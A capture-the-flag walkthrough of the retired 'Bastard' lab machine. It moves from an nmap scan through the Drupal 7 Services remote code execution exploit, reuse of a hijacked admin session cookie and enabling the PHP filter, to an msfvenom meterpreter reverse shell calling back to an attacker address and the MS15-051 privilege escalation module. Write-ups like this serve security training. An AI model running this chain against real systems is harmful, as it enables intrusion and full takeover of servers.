Today we’re going to solve another CTF machine “Bastard”. It is now retired box and can be accessible if you’re a VIP member.
Introduction
Specifications
- Target OS: Windows
- Services: HTTP, msrpc, unkown
- IP Address: 10.10.10.9
- Difficulty: Medium
Weakness
- Exploit-DB 41564
- MS15-051
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
Enumerate Drupal
Drupal is running on http and nmap gave us some information we need to check.
80/tcp open http Microsoft IIS httpd 7.5 |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC
Before everything we have to check which version of drupal is install. We need to check CHANGLOG.txt to find more details.
In that case we have Drupal 7.54 installed let’s searchsploit.
The exploit which we’re gonna use is “Drupal 7.x Module Services – Remote Code Execution”
We need to modify our exploit. The exploit needs rest api path which we found in our directory enumeration so we set our endpoint path to /rest.
$url = 'http://10.10.10.9'; $endpoint_path = '/rest';
By running this exploit we got two files user.json and session.json.
There’s two ways to get reverse shell.
Reverse Shell Using Drupal
We can use sessions.txt data to login as administrator which we got through running exploit.
sessions.txt
{
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "li1-xoDBXCgxKg0rI9tn3pS6CsfJaQKwEjARmfxlxa0",
"token": "2dnjgeee6Cy5hRPikPeogGjbxqqgdKeyEo2v32d-jEU"
}
Now let’s go to http://10.10.10.9/admin
Cookie: has_js=1; Drupal.toolbar.collapsed=0
We have to modify the cookie in this format.
Cookie: session_name=session_id;token
Once you have access to administration panel go to Modules and enable PHP filter so we can get reverse shell.
You can get user.txt file from C:\Users\dimitris\Desktop directory.
Privilege Escalation
Now we have user access we have to use exploit suggester module in order to obtain more information regarding the box.
We have a user session via php shell let’s switch to actual reverse shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=1338 -f exe > shell.exe
Now simply upload and run shell.exe
Now we got a proper reverse shell.
By using exploit suggester we got few exploits which i tested and one of them worked.
use exploit/windows/local/ms15_051_client_copy_image
And we are NT Authority.
We can obtain root.txt from here: C:\Users\Administrator\Desktop\root.txt